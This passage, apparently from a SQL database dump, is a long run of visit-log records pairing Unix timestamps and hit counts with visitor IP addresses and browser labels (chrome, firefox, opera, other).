2,2,0,0,'46.211.101.171','chrome'),(562168,1646640404,1,1,0,0,'92.118.160.5','other'),(562169,1646650285,1,1,0,0,'91.196.178.252','chrome'),(562170,1646655044,2,2,0,0,'40.76.207.72','firefox'),(562171,1646689300,2,2,0,0,'87.250.224.182','other'),(562172,1646689561,1,1,0,0,'5.45.207.149','other'),(562173,1646689593,1,1,0,0,'5.255.253.111','other'),(562174,1646689598,3,3,0,0,'141.8.142.65','other'),(562175,1646689600,2,2,0,0,'87.250.224.125','other'),(562176,1646689603,3,3,0,0,'5.255.253.158','other'),(562177,1646689605,1,1,0,0,'87.250.224.105','other'),(562178,1646689608,1,1,0,0,'5.45.207.95','other'),(562179,1646689610,1,1,0,0,'87.250.224.169','other'),(562180,1646689613,2,2,0,0,'87.250.224.153','other'),(562181,1646689615,2,2,0,0,'87.250.224.80','other'),(562182,1646689631,2,2,0,0,'5.255.253.184','other'),(562183,1646689651,2,2,0,0,'87.250.224.151','other'),(562184,1646689653,1,1,0,0,'87.250.224.42','other'),(562185,1646689690,1,1,0,0,'213.180.203.175','other'),(562186,1646689750,2,2,0,0,'141.8.142.77','other'),(562187,1646689814,2,2,0,0,'5.255.253.162','other'),(562189,1646689834,1,1,0,0,'141.8.142.91','other'),(562190,1646689855,1,1,0,0,'5.255.253.113','other'),(562191,1646689886,2,2,0,0,'95.108.213.26','other'),(562192,1646689919,2,2,0,0,'213.180.203.12','other'),(562193,1646689920,1,1,0,0,'5.255.253.173','other'),(562194,1646690125,1,1,0,0,'87.250.224.77','other'),(562195,1646690150,1,1,0,0,'95.108.213.76','other'),(562196,1646690555,1,1,0,0,'5.255.253.184','other'),(562197,1646690556,1,1,0,0,'5.255.231.205','other'),(562198,1646690564,1,1,0,0,'141.8.142.66','other'),(562199,1646690795,1,1,0,0,'213.180.203.17','other'),(562200,1646690925,1,1,0,0,'141.8.142.65','other'),(562201,1646691509,2,2,0,0,'5.45.207.95','other'),(562202,1646691940,1,1,0,0,'141.8.142.65','other'),(562203,1646692115,1,1,0,0,'95.108.213.76','chrome'),(562204,1646692117,2,2,0,0,'5.255.253.113','other'),(562205,1646692914,1,1,0,0,'5.255.253.162','other'),(562206,1646692916,1,1,0,0,'141.8.142.66','other'),(562208,1646692917,1,1,0,0,'87.250.224.77','other'),(562210,1646692918,1,1,0,0,'5.45.207.149','other'),(562211,1646692919,1,1,0,0,'95.108.213.76','other'),(562213,1646696569,1,1,0,0,'194.38.20.161','other'),(562214,1646712220,1,1,0,0,'213.180.203.97','chrome'),(562215,1646716157,1,1,0,0,'52.162.90.85','firefox'),(562216,1646729073,2,2,0,0,'5.196.141.210','other'),(562217,1646730488,1,1,0,0,'31.13.127.118','other'),(562218,1646736875,1,1,0,0,'213.180.203.97','other'),(562219,1646745972,1,1,0,0,'159.65.43.206','other'),(562220,1646772898,1,1,0,0,'157.55.39.43','other'),(562221,1646799505,2,2,0,0,'151.80.125.149','chrome'),(562222,1646805820,1,1,0,0,'194.38.20.161','other'),(562223,1646823888,1,1,0,0,'207.46.13.100','other'),(562224,1646854534,1,1,0,0,'34.219.164.38','firefox'),(562225,1646885966,1,1,0,0,'151.80.125.149','chrome'),(562226,1646885967,1,1,0,0,'151.80.125.149','firefox'),(562227,1646888982,1,1,0,0,'5.255.253.158','chrome'),(562228,1646899942,1,1,0,0,'64.225.62.166','other'),(562229,1646925239,1,1,0,0,'194.38.20.161','other'),(562230,1647025967,2,2,0,0,'18.117.121.98','chrome'),(562234,1647038898,1,1,0,0,'51.68.111.184','other'),(562235,1647058473,2,2,0,0,'212.193.30.189','firefox'),(562236,1647059170,2,2,0,0,'176.31.28.234','chrome'),(562237,1647099838,1,1,0,0,'194.38.20.161','other'),(562238,1647145549,2,2,0,0,'5.196.141.210','chrome'),(562239,1647150939,1,1,0,0,'54.92.131.180','firefox'),(562240,1647150992,1,1,0,0,'34.234.71.9','firefox'),(562241,1647163374,20,20,0,0,'40.71.61.90','chrome'),(562242,1647183241,1,1,0,0,'5.181.235.73','chrome'),(562243,1647222167,1,1,0,0,'3.249.8.80','other'),(562244,1647231509,2,2,0,0,'176.31.40.215','chrome'),(562245,1647240537,1,1,0,0,'87.250.224.134','other'),(562246,1647258833,2,2,0,0,'185.237.217.30','chrome'),(562247,1647263763,1,1,0,0,'31.13.127.21','other'),(562248,1647263764,1,1,0,0,'31.13.127.4','other'),(562249,1647263789,1,1,0,0,'31.13.127.6','other'),(562250,1647267390,1,1,0,0,'50.59.99.143','firefox'),(562251,1647290301,1,1,0,0,'5.58.163.101','other'),(562252,1647310436,1,1,0,0,'34.248.252.148','other'),(562253,1647325476,1,1,0,0,'20.63.222.45','chrome'),(562254,1647331051,1,1,0,0,'95.108.213.6','other'),(562255,1647339173,20,20,0,0,'207.244.91.177','chrome'),(562256,1647388531,1,1,0,0,'31.22.4.49','firefox'),(562257,1647400438,1,1,0,0,'207.46.13.79','other'),(562258,1647419730,27,27,0,0,'20.118.133.18','other'),(562259,1647419785,13,13,0,0,'20.118.133.18','chrome'),(562260,1647420338,1,1,0,0,'31.13.127.24','other'),(562261,1647420339,1,1,0,0,'31.13.127.25','other'),(562262,1647420693,30,30,0,0,'20.118.133.18','other'),(562263,1647420708,1,1,0,0,'20.118.133.18','chrome'),(562264,1647428154,1,1,0,0,'82.145.220.187','chrome'),(562265,1647460858,1,1,0,0,'51.255.64.58','firefox'),(562266,1647464972,1,1,0,0,'3.145.156.93','chrome'),(562267,1647469437,1,1,0,0,'20.70.40.17','chrome'),(562268,1647476536,1,1,0,0,'194.38.20.161','other'),(562269,1647481023,5,5,0,0,'13.58.154.63','chrome'),(562270,1647490816,2,2,0,0,'176.31.40.215','chrome'),(562271,1647492002,1,1,0,0,'54.229.245.162','other'),(562272,1647500448,1,1,0,0,'18.192.4.191','firefox'),(562273,1647524263,1,1,0,0,'157.55.39.29','other'),(562274,1647528363,1,1,0,0,'157.55.39.26','other'),(562275,1647542008,2,2,0,0,'167.248.133.120','other'),(562276,1647542144,1,1,0,0,'204.12.202.94','chrome'),(562277,1647550890,1,1,0,0,'157.55.39.126','other'),(562278,1647553088,10,10,0,0,'194.61.28.220','chrome'),(562279,1647569633,20,20,0,0,'207.244.91.144','chrome'),(562280,1647583308,20,20,0,0,'164.92.131.9','chrome'),(562281,1647604005,1,1,0,0,'31.13.127.3','other'),(562282,1647617175,1,1,0,0,'194.38.20.161','other'),(562283,1647629474,1,1,0,0,'157.55.39.126','other'),(562284,1647632447,1,1,0,0,'173.252.79.117','other'),(562285,1647644012,1,1,0,0,'178.128.54.225','firefox'),(562286,1647663520,2,2,0,0,'176.31.28.234','chrome'),(562287,1647675130,1,1,0,0,'31.210.20.122','other'),(562288,1647685011,1,1,0,0,'157.55.39.56','other'),(562289,1647692841,2,2,0,0,'195.133.18.141','firefox'),(562290,1647704940,1,1,0,0,'157.55.39.126','other'),(562291,1647732785,1,1,0,0,'159.100.253.159','chrome'),(562292,1647735210,1,1,0,0,'159.100.253.159','chrome'),(562293,1647736391,1,1,0,0,'194.38.20.161','other'),(562294,1647740397,1,1,0,0,'159.100.253.159','chrome'),(562295,1647748140,63,63,0,0,'31.210.20.122','firefox'),(562296,1647749417,1,1,0,0,'159.100.253.159','chrome'),(562297,1647749919,2,2,0,0,'149.202.99.249','chrome'),(562298,1647751782,1,1,0,0,'159.100.253.159','chrome'),(562299,1647752913,1,1,0,0,'159.100.253.159','chrome'),(562300,1647755308,1,1,0,0,'159.100.253.159','chrome'),(562301,1647756529,1,1,0,0,'159.100.253.159','chrome'),(562302,1647757690,1,1,0,0,'159.100.253.159','chrome'),(562303,1647758864,1,1,0,0,'159.100.253.159','chrome'),(562304,1647764765,1,1,0,0,'159.100.253.159','chrome'),(562305,1647770469,1,1,0,0,'159.100.253.159','chrome'),(562306,1647775324,1,1,0,0,'159.100.253.159','chrome'),(562307,1647787444,2,2,0,0,'185.149.113.124','chrome'),(562309,1647787445,1,1,0,0,'185.149.113.124','other'),(562312,1647806901,1,1,0,0,'157.55.39.126','other'),(562313,1647810942,1,1,0,0,'207.46.13.79','other'),(562314,1647822780,5,5,0,0,'35.171.154.34','chrome'),(562315,1647866290,1,1,0,0,'194.38.20.161','other'),(562316,1647875801,1,1,0,0,'51.142.99.17','chrome'),(562317,1647881880,1,1,0,0,'51.79.241.19','firefox'),(562318,1647920264,1,1,0,0,'64.246.165.210','firefox'),(562319,1647932683,11,11,0,0,'185.59.221.226','other'),(562320,1647932744,1,1,0,0,'95.108.213.6','other'),(562321,1647939696,2,2,0,0,'133.242.174.119','other'),(562322,1647939704,2,2,0,0,'133.242.140.127','other'),(562323,1647941079,1,1,0,0,'157.55.39.29','other'),(562324,1647972717,1,1,0,0,'35.88.35.29','chrome'),(562325,1647973518,2,2,0,0,'176.53.219.95','chrome'),(562326,1647978100,20,20,0,0,'207.244.91.144','chrome'),(562327,1647978903,1,1,0,0,'114.119.145.66','other'),(562328,1647979668,2,2,0,0,'176.53.221.27','chrome'),(562329,1648001945,1,1,0,0,'207.46.13.79','other'),(562330,1648008109,2,2,0,0,'176.113.43.46','chrome'),(562331,1648009500,2,2,0,0,'176.113.42.198','chrome'),(562332,1648009542,1,1,0,0,'151.80.125.149','opera'),(562333,1648009545,1,1,0,0,'151.80.125.149','chrome'),(562334,1648038019,1,1,0,0,'69.171.249.7','other'),(562335,1648038020,1,1,0,0,'69.171.249.13','other'),(562336,1648039809,1,1,0,0,'42.236.10.106','chrome'),(562337,1648039841,1,1,0,0,'27.115.124.45','chrome'),(562338,1648040964,1,1,0,0,'171.13.14.49','chrome'),(562339,1648041005,1,1,0,0,'171.13.14.83','chrome'),(562340,1648060204,2,2,0,0,'89.104.111.96','chrome'),(562341,1648061998,1,1,0,0,'184.168.115.128','firefox'),(562342,1648066544,2,2,0,0,'176.53.218.107','chrome'),(562343,1648083245,5,5,0,0,'35.210.151.25','chrome'),(562344,1648085566,1,1,0,0,'194.38.20.161','other'),(562345,1648093716,2,2,0,0,'176.53.223.225','chrome'),(562346,1648095158,1,1,0,0,'89.104.100.78','chrome'),(562347,1648095160,2,2,0,0,'176.113.43.14','chrome'),(562348,1648095538,2,2,0,0,'176.31.28.234','chrome'),(562349,1648097704,1,1,0,0,'66.249.65.201','chrome'),(562350,1648098995,1,1,0,0,'66.249.65.197','chrome'),(562351,1648116071,1,1,0,0,'20.216.2.198','chrome'),(562352,1648125244,1,1,0,0,'66.249.70.5','chrome'),(562353,1648132694,1,1,0,0,'31.13.127.32','other'),(562354,1648132695,1,1,0,0,'31.13.127.27','other'),(562356,1648140135,2,2,0,0,'51.79.16.44','other'),(562357,1648140986,1,1,0,0,'5.255.253.150','other'),(562358,1648150218,1,0,1,0,'66.249.70.9',''),(562359,1648164006,1,1,0,0,'207.46.13.8','other'),(562360,1648170129,1,1,0,0,'66.249.70.9','chrome'),(562361,1648181570,2,2,0,0,'45.90.63.151','chrome'),(562362,1648181933,2,2,0,0,'176.31.40.215','other'),(562363,1648183132,2,2,0,0,'45.90.61.40','chrome'),(562364,1648188388,5,5,0,0,'161.35.90.232','chrome'),(562365,1648198619,2,2,0,0,'91.196.177.82','chrome'),(562366,1648199704,1,1,0,0,'66.249.70.9','chrome'),(562367,1648201759,1,1,0,0,'207.46.13.79','other'),(562368,1648202962,1,0,1,0,'66.249.70.5',''),(562369,1648213569,1,1,0,0,'173.252.79.8','other'),(562370,1648218972,1,1,0,0,'20.213.72.228','chrome'),(562371,1648222151,1,1,0,0,'157.55.39.56','other'),(562372,1648230853,1,1,0,0,'178.133.9.7','chrome'),(562373,1648236603,1,1,0,0,'207.46.13.79','other'),(562374,1648236900,4,4,0,0,'162.220.160.140','chrome'),(562375,1648237853,10,10,0,0,'162.220.160.140','other'),(562376,1648249757,1,1,0,0,'91.196.178.43','chrome'),(562377,1648254954,1,1,0,0,'66.249.70.5','chrome'),(562378,1648268346,2,2,0,0,'176.31.40.215','chrome'),(562379,1648271998,1,0,1,0,'66.249.70.7',''),(562380,1648276927,1,1,0,0,'142.132.204.223','other'),(562381,1648277538,1,1,0,0,'91.196.178.44','chrome'),(562382,1648282777,1,0,1,0,'66.249.70.9',''),(562383,1648291767,1,1,0,0,'157.55.39.19','other'),(562384,1648294295,1,1,0,0,'20.228.211.153','chrome'),(562385,1648297097,1,1,0,0,'207.46.13.79','other'),(562386,1648299388,1,1,0,0,'27.115.124.45','chrome'),(562387,1648299511,1,1,0,0,'27.115.124.38','chrome'),(562388,1648302214,1,1,0,0,'5.255.253.150','other'),(562389,1648316481,4,4,0,0,'217.31.207.89','chrome'),(562390,1648319165,2,2,0,0,'40.76.207.72','firefox'),(562391,1648321242,1,0,1,0,'66.249.70.7',''),(562392,1648323419,2,2,0,0,'167.248.133.120','other'),(562393,1648334031,1,1,0,0,'66.249.70.5','chrome'),(562394,1648338106,1,1,0,0,'157.55.39.56','other'),(562395,1648354716,2,2,0,0,'176.31.40.215','chrome'),(562396,1648357345,1,1,0,0,'157.55.39.19','other'),(562397,1648359148,1,0,1,0,'66.249.70.9',''),(562398,1648359212,1,1,0,0,'91.196.178.47','chrome'),(562399,1648361357,1,1,0,0,'207.46.13.79','other'),(562400,1648364839,1,1,0,0,'154.6.19.156','chrome'),(562401,1648370463,1,1,0,0,'66.249.70.9','chrome'),(562402,1648370479,1,0,1,0,'66.249.70.5',''),(562403,1648371826,1,1,0,0,'185.201.47.14','firefox'),(562404,1648378177,1,1,0,0,'66.249.70.7','chrome'),(562405,1648382508,1,0,1,0,'66.249.70.9',''),(562406,1648383418,1,1,0,0,'66.249.70.7','chrome'),(562407,1648385606,1,0,1,0,'66.249.70.9',''),(562408,1648385624,1,1,0,0,'66.249.70.7','chrome'),(562409,1648394271,2,1,1,0,'66.249.70.9',''),(562410,1648399412,1,1,0,0,'20.25.95.75','chrome'),(562411,1648400616,1,1,0,0,'20.228.211.153','chrome'),(562412,1648400710,1,1,0,0,'91.196.178.205','chrome'),(562413,1648401845,1,0,1,0,'66.249.70.5',''),(562414,1648403294,1,1,0,0,'66.249.70.5','chrome'),(562415,1648404007,1,1,0,0,'20.25.95.75','chrome'),(562416,1648415927,1,1,0,0,'157.55.39.56','other'),(562417,1648422579,1,1,0,0,'157.55.39.56','other'),(562418,1648436541,1,1,0,0,'194.38.20.161','other'),(562419,1648441110,1,0,1,0,'66.249.70.9',''),(562420,1648441188,2,2,0,0,'151.80.125.149','chrome'),(562421,1648443145,1,1,0,0,'66.249.70.5','chrome'),(562422,1648444748,1,0,1,0,'66.249.70.5',''),(562423,1648454737,1,1,0,0,'91.196.178.47','chrome'),(562424,1648455488,1,0,1,0,'66.249.70.7',''),(562425,1648476130,1,1,0,0,'45.129.18.37','chrome'),(562426,1648476132,1,1,0,0,'45.129.18.93','chrome'),(562427,1648478262,1,1,0,0,'207.46.13.8','other'),(562428,1648482491,1,1,0,0,'66.249.70.5','chrome'),(562429,1648492303,1,0,1,0,'66.249.70.9',''),(562430,1648495179,1,1,0,0,'95.108.213.62','other'),(562431,1648495406,1,1,0,0,'66.249.70.5','chrome'),(562432,1648498675,3,3,0,0,'216.137.184.101','other'),(562433,1648498676,2,2,0,0,'216.137.184.101','chrome'),(562435,1648498677,1,1,0,0,'216.137.184.101','firefox'),(562436,1648500364,1,1,0,0,'173.252.107.24','other'),(562437,1648505017,1,1,0,0,'5.255.253.150','other'),(562438,1648511101,1,1,0,0,'5.255.253.150','other'),(562439,1648527540,2,2,0,0,'149.202.99.249','chrome'),(562440,1648530271,1,1,0,0,'66.249.70.5','chrome'),(562441,1648532158,1,1,0,0,'66.249.70.9','chrome'),(562442,1648534845,1,0,1,0,'66.249.70.9',''),(562443,1648535923,1,1,0,0,'66.249.70.9','chrome'),(562444,1648546423,1,0,1,0,'66.249.70.7',''),(562445,1648554014,1,1,0,0,'66.249.70.7','chrome'),(562446,1648555195,1,0,1,0,'66.249.70.5',''),(562447,1648559796,2,1,1,0,'66.249.70.5',''),(562448,1648566587,1,1,0,0,'136.243.176.240','firefox'),(562449,1648579523,1,1,0,0,'5.255.253.148','other'),(562450,1648581801,1,1,0,0,'66.249.70.7','chrome'),(562451,1648593698,1,1,0,0,'78.47.72.150','other'),(562452,1648594007,1,1,0,0,'65.108.217.244','other'),(562453,1648594048,1,1,0,0,'81.7.15.127','firefox'),(562454,1648594070,1,1,0,0,'135.181.183.118','firefox'),(562455,1648594091,1,1,0,0,'198.100.144.147','firefox'),(562456,1648594302,1,1,0,0,'65.108.84.188','chrome'),(562457,1648594952,1,0,1,0,'66.249.70.5',''),(562458,1648595014,1,1,0,0,'142.132.194.59','firefox'),(562459,1648596928,1,0,1,0,'66.249.70.5',''),(562460,1648598995,1,1,0,0,'66.249.70.5','chrome'),(562461,1648600940,1,1,0,0,'95.217.177.155','firefox'),(562462,1648602223,1,1,0,0,'142.132.184.111','firefox'),(562463,1648604501,1,1,0,0,'66.70.151.131','firefox'),(562464,1648613906,1,1,0,0,'176.31.28.234','firefox'),(562466,1648615335,2,1,1,0,'66.249.70.9',''),(562467,1648616265,1,1,0,0,'66.249.70.5','chrome'),(562468,1648629087,1,1,0,0,'194.38.20.161','other'),(562469,1648639099,1,1,0,0,'212.115.42.244','chrome'),(562470,1648651715,1,1,0,0,'66.249.70.5','chrome'),(562471,1648661092,1,1,0,0,'66.249.70.9','chrome'),(562472,1648669178,1,0,1,0,'66.249.70.5',''),(562473,1648674881,20,20,0,0,'54.214.160.126','chrome'),(562474,1648679367,1,1,0,0,'31.13.127.21','other'),(562476,1648686461,1,1,0,0,'66.249.70.5','chrome'),(562477,1648686901,1,1,0,0,'157.55.39.6','other'),(562478,1648691189,1,1,0,0,'93.113.111.193','firefox'),(562479,1648693603,1,1,0,0,'207.46.13.103','other'),(562480,1648694468,1,0,1,0,'66.249.70.5',''),(562481,1648700306,1,1,0,0,'149.202.99.249','chrome'),(562483,1648704886,1,1,0,0,'91.236.254.96','other'),(562484,1648711857,1,1,0,0,'157.55.39.19','other'),(562485,1648711885,1,1,0,0,'207.46.13.79','other'),(562486,1648732839,1,1,0,0,'69.171.249.24','other'),(562487,1648732840,1,1,0,0,'69.171.249.117','other'),(562488,1648736303,1,1,0,0,'213.180.203.62','other'),(562489,1648740412,1,0,1,0,'66.249.70.7',''),(562490,1648740709,1,1,0,0,'66.249.70.7','chrome'),(562491,1648742599,1,1,0,0,'207.46.13.103','other'),(562492,1648756618,1,1,0,0,'213.180.203.10','other'),(562493,1648759273,1,1,0,0,'157.55.39.6','other'),(562494,1648761447,5,5,0,0,'13.59.107.43','chrome'),(562495,1648762707,1,0,1,0,'66.249.70.7',''),(562496,1648772996,1,1,0,0,'5.161.77.72','firefox'),(562497,1648773066,1,1,0,0,'65.21.179.18','firefox'),(562498,1648773068,1,1,0,0,'135.181.149.230','firefox'),(562499,1648773078,1,1,0,0,'65.108.84.188','chrome'),(562500,1648773093,1,1,0,0,'78.71.236.45','firefox'),(562501,1648773141,1,1,0,0,'135.181.149.173','firefox'),(562502,1648773191,1,1,0,0,'138.197.202.199','chrome'),(562503,1648782625,1,1,0,0,'135.181.214.38','firefox'),(562504,1648787441,1,1,0,0,'135.181.149.230','firefox'),(562505,1648788496,1,1,0,0,'135.181.149.173','firefox'),(562506,1648789049,1,1,0,0,'34.96.130.12','other'),(562507,1648797070,1,1,0,0,'66.249.70.5','chrome'),(562508,1648797816,1,0,1,0,'66.249.70.7',''),(562509,1648798959,1,1,0,0,'66.249.70.5','chrome'),(562510,1648803225,2,2,0,0,'159.242.234.225','chrome'),(562511,1648807061,1,1,0,0,'194.38.20.161','other'),(562512,1648826795,2,2,0,0,'137.74.27.104','firefox'),(562513,1648837209,1,1,0,0,'185.237.217.11','chrome'),(562514,1648844396,1,0,1,0,'66.249.70.5',''),(562515,1648848000,1,1,0,0,'173.252.111.117','other'),(562516,1648848635,1,0,1,0,'66.249.70.5',''),(562517,1648858336,1,1,0,0,'157.55.39.56','other'),(562518,1648873391,1,1,0,0,'176.31.40.215','chrome'),(562519,1648873392,1,1,0,0,'176.31.40.215','opera'),(562520,1648873666,1,0,1,0,'66.249.70.5',''),(562521,1648875436,1,1,0,0,'66.249.70.9','chrome'),(562522,1648879377,1,1,0,0,'173.252.79.18','other'),(562523,1648899486,1,1,0,0,'65.21.151.136','chrome'),(562524,1648899501,1,1,0,0,'66.249.70.5','chrome'),(562525,1648902930,1,0,1,0,'66.249.70.5',''),(562526,1648910150,1,1,0,0,'66.249.70.7','chrome'),(562527,1648911888,1,1,0,0,'157.55.39.19','other'),(562528,1648935155,1,1,0,0,'92.118.160.17','other'),(562529,1648937927,1,1,0,0,'212.192.241.63','chrome'),(562530,1648943354,1,1,0,0,'207.46.13.8','other'),(562531,1648944212,1,0,1,0,'66.249.70.7',''),(562532,1648959491,1,1,0,0,'151.80.125.149','other'),(562533,1648959492,1,1,0,0,'151.80.125.149','chrome'),(562534,1648960325,1,1,0,0,'157.245.9.241','other'),(562535,1648960878,1,1,0,0,'91.196.178.51','chrome'),(562536,1648966681,1,1,0,0,'194.38.20.161','other'),(562537,1648971043,1,1,0,0,'66.249.70.9','chrome'),(562538,1648977902,1,0,1,0,'66.249.70.7',''),(562539,1648977904,1,0,1,0,'66.249.70.5',''),(562540,1648984897,1,1,0,0,'95.108.213.49','other'),(562541,1648989062,1,1,0,0,'207.46.13.103','other'),(562542,1649002976,1,1,0,0,'207.46.13.79','other'),(562543,1649003091,1,1,0,0,'66.249.70.9','chrome'),(562544,1649003137,1,1,0,0,'185.237.217.11','chrome'),(562545,1649005856,1,1,0,0,'157.55.39.19','other'),(562546,1649008373,1,1,0,0,'92.118.160.41','other'),(562547,1649013109,1,1,0,0,'124.158.12.202','firefox'),(562548,1649013815,1,1,0,0,'157.55.39.19','other'),(562549,1649018257,3,3,0,0,'20.228.215.179','other'),(562550,1649021773,1,1,0,0,'95.108.213.5','chrome'),(562551,1649029287,1,0,1,0,'66.249.70.7',''),(562552,1649031232,1,1,0,0,'66.249.70.7','chrome'),(562553,1649046338,2,2,0,0,'176.31.28.234','chrome'),(562554,1649049551,1,1,0,0,'20.230.77.116','chrome'),(562555,1649051985,1,1,0,0,'92.118.160.57','other'),(562556,1649059659,1,1,0,0,'66.249.70.9','chrome'),(562557,1649064166,1,1,0,0,'66.249.70.9','chrome'),(562558,1649065305,2,1,1,0,'66.249.70.25',''),(562559,1649065614,1,1,0,0,'66.249.70.27','chrome'),(562560,1649066811,1,0,1,0,'66.249.70.27',''),(562561,1649066967,1,1,0,0,'66.249.70.25','chrome'),(562562,1649070542,1,1,0,0,'66.249.70.29','chrome'),(562563,1649070582,1,0,1,0,'66.249.70.25',''),(562564,1649071646,1,1,0,0,'127.0.0.1','chrome'),(562565,1649072109,2,1,1,0,'66.249.66.57',''),(562566,1649072130,2,1,1,0,'66.249.66.59',''),(562567,1649072735,1,1,0,0,'66.249.66.57','chrome'),(562568,1649073807,3,3,0,0,'66.249.66.59','chrome'),(562569,1649073900,2,2,0,0,'66.249.66.61','chrome'),(562570,1649073967,2,1,1,0,'66.249.66.57',''),(562571,1649075904,1,0,1,0,'66.249.66.61',''),(562572,1649077010,1,0,1,0,'66.249.66.61',''),(562573,1649078188,2,2,0,0,'66.249.66.57','chrome'),(562574,1649078485,1,1,0,0,'66.249.66.59','chrome'),(562575,1649079603,1,1,0,0,'5.173.10.219','chrome'),(562576,1649079995,1,1,0,0,'66.249.66.57','chrome'),(562577,1649081556,4,3,1,0,'66.249.66.59',''),(562578,1649081571,1,1,0,0,'66.249.66.57','chrome'),(562579,1649082034,1,1,0,0,'66.249.66.59','chrome'),(562580,1649082542,2,2,0,0,'66.249.66.57','chrome'),(562581,1649082881,1,1,0,0,'78.55.232.44','firefox'),(562582,1649083070,2,2,0,0,'66.249.66.59','chrome'),(562583,1649084087,1,1,0,0,'66.249.66.57','chrome'),(562584,1649085879,1,1,0,0,'66.249.66.59','chrome'),(562585,1649091347,1,1,0,0,'207.46.13.79','other'),(562586,1649093591,1,1,0,0,'66.249.66.59','chrome'),(562587,1649096455,1,1,0,0,'66.249.66.59','chrome'),(562588,1649106783,1,1,0,0,'107.150.46.162','chrome'),(562589,1649109052,2,2,0,0,'162.142.125.213','other'),(562590,1649110343,1,0,1,0,'66.249.66.57',''),(562591,1649115203,1,0,1,0,'66.249.66.57',''),(562592,1649119572,1,1,0,0,'34.77.162.5','other'),(562593,1649124193,1,1,0,0,'5.255.253.145','other'),(562594,1649128154,1,1,0,0,'194.38.20.161','other'),(562595,1649129621,5,5,0,0,'103.240.34.130','chrome'),(562596,1649132321,2,2,0,0,'176.31.28.234','chrome'),(562597,1649151438,1,1,0,0,'77.11.79.228','firefox'),(562598,1649153539,1,1,0,0,'207.46.13.103','other'),(562599,1649160621,1,1,0,0,'45.129.18.112','chrome'),(562600,1649166563,1,1,0,0,'45.129.18.177','chrome'),(562601,1649176926,1,1,0,0,'141.94.21.233','firefox'),(562602,1649177454,1,1,0,0,'34.77.162.1','other'),(562603,1649182463,1,1,0,0,'194.182.180.250','chrome'),(562604,1649190057,1,1,0,0,'167.71.101.124','other'),(562605,1649191004,1,0,1,0,'66.249.66.209',''),(562606,1649196147,1,1,0,0,'167.71.106.131','other'),(562607,1649202719,1,1,0,0,'45.129.18.22','chrome'),(562608,1649218735,1,1,0,0,'176.31.28.234','other'),(562609,1649218737,1,1,0,0,'176.31.28.234','opera'),(562610,1649228100,1,1,0,0,'40.86.86.74','chrome'),(562611,1649229175,1,1,0,0,'188.40.48.120','firefox'),(562612,1649250039,1,1,0,0,'45.129.18.110','chrome'),(562613,1649250331,2,2,0,0,'89.248.174.178','other'),(562614,1649259261,20,20,0,0,'128.199.126.60','chrome'),(562615,1649262938,1,1,0,0,'5.255.253.150','other'),(562616,1649264318,1,1,0,0,'66.70.168.99','other'),(562617,1649275786,1,0,1,0,'66.249.66.57',''),(562618,1649276935,1,1,0,0,'133.167.92.28','firefox'),(562619,1649280379,2,2,0,0,'91.196.178.38','chrome'),(562620,1649297142,1,1,0,0,'207.46.13.79','other'),(562621,1649305079,2,2,0,0,'45.82.81.225','chrome'),(562622,1649310762,1,1,0,0,'194.38.20.161','other'),(562623,1649311811,1,1,0,0,'35.175.200.40','firefox'),(562624,1649315145,1,1,0,0,'5.255.253.150','other'),(562625,1649315624,3,3,0,0,'92.118.36.208','chrome'),(562626,1649322963,1,1,0,0,'89.12.12.15','firefox'),(562627,1649344600,1,1,0,0,'31.13.127.23','other'),(562628,1649344601,1,1,0,0,'31.13.127.3','other'),(562629,1649370286,2,0,2,0,'66.249.66.57',''),(562630,1649370545,57,57,0,0,'208.110.73.82','other'),(562631,1649370605,14,14,0,0,'208.110.73.82','chrome'),(562632,1649371468,1,1,0,0,'208.110.73.82','other'),(562633,1649372791,1,1,0,0,'208.110.73.82','other'),(562634,1649374089,1,1,0,0,'208.110.73.82','other'),(562635,1649375981,1,1,0,0,'208.110.73.82','other'),(562636,1649377311,1,1,0,0,'208.110.73.82','other'),(562637,1649379056,1,1,0,0,'148.153.98.19','chrome'),(562638,1649391517,1,1,0,0,'45.82.81.238','chrome'),(562639,1649391518,1,1,0,0,'45.82.81.238','other'),(562640,1649406325,1,0,1,0,'66.249.66.61',''),(562641,1649408228,1,1,0,0,'66.249.66.57','chrome'),(562642,1649415028,1,1,0,0,'5.255.253.131','other'),(562643,1649416946,1,0,1,0,'66.249.66.61',''),(562644,1649440397,1,1,0,0,'194.38.20.161','other'),(562645,1649446714,1,1,0,0,'173.252.111.27','other'),(562646,1649446715,1,1,0,0,'173.252.111.26','other'),(562647,1649446718,1,1,0,0,'173.252.111.6','other'),(562649,1649449040,1,1,0,0,'45.154.255.147','other'),(562650,1649449041,1,1,0,0,'107.189.8.65','other'),(562651,1649452811,1,1,0,0,'69.171.231.120','other'),(562652,1649453209,1,1,0,0,'31.13.103.14','other'),(562653,1649453228,1,1,0,0,'173.252.111.13','other'),(562654,1649453229,1,1,0,0,'173.252.111.14','other'),(562655,1649455025,1,1,0,0,'34.96.130.31','other'),(562656,1649456646,1,0,1,0,'66.249.66.57',''),(562657,1649461746,1,1,0,0,'66.249.66.57','chrome'),(562658,1649463813,1,1,0,0,'66.249.66.61','chrome'),(562659,1649465607,1,1,0,0,'66.249.66.61','chrome'),(562660,1649479974,1,1,0,0,'34.77.162.28','other'),(562661,1649484970,1,1,0,0,'77.81.116.187','firefox'),(562662,1649494795,1,1,0,0,'77.191.75.118','firefox'),(562663,1649503765,1,1,0,0,'66.249.70.7','chrome'),(562664,1649505078,1,0,1,0,'66.249.70.5',''),(562665,1649505211,1,1,0,0,'66.249.70.5','chrome'),(562666,1649507910,1,1,0,0,'66.249.70.5','chrome'),(562667,1649512490,1,1,0,0,'207.46.13.79','other'),(562668,1649520918,1,1,0,0,'66.249.70.5','chrome'),(562669,1649529112,1,1,0,0,'207.46.13.103','other'),(562670,1649530852,1,0,1,0,'66.249.70.9',''),(562671,1649533397,1,1,0,0,'66.249.70.5','chrome'),(562672,1649535945,1,1,0,0,'20.219.128.39','chrome'),(562673,1649541589,1,0,1,0,'66.249.70.7',''),(562674,1649541591,1,0,1,0,'66.249.70.5',''),(562675,1649553346,1,1,0,0,'66.249.70.7','chrome'),(562676,1649564321,2,2,0,0,'45.82.81.240','chrome'),(562677,1649572566,1,0,1,0,'66.249.70.5',''),(562678,1649572781,1,1,0,0,'66.249.70.7','chrome'),(562679,1649586217,1,1,0,0,'51.107.89.210','chrome'),(562680,1649591115,1,1,0,0,'66.249.70.7','chrome'),(562681,1649591127,1,0,1,0,'66.249.70.5',''),(562682,1649597210,1,0,1,0,'66.249.70.5',''),(562683,1649597218,1,1,0,0,'66.249.70.7','chrome'),(562684,1649604955,1,1,0,0,'194.38.20.161','other'),(562685,1649606470,1,1,0,0,